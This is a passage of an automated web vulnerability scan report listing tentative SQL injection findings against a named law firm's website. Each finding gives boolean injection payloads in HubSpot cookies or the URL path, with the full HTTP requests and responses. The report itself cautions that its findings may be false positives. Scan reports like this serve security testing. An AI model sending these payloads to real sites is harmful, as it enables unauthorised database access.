<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 78616436'%20or%201%3d1--%20 and 78616436'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:09:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819626;path=/
Set-Cookie: CFTOKEN=40904157;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 57053856'%20or%201%3d1--%20 and 57053856'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:10:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819645;path=/
Set-Cookie: CFTOKEN=46650698;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 17776757'%20or%201%3d1--%20 and 17776757'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:10:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819684;path=/
Set-Cookie: CFTOKEN=93449910;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 16942143'%20or%201%3d1--%20 and 16942143'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:10:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819666;path=/
Set-Cookie: CFTOKEN=29553522;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /404.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 57742005'%20or%201%3d1--%20 and 57742005'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /404.htm57742005'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /404.htm57742005'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
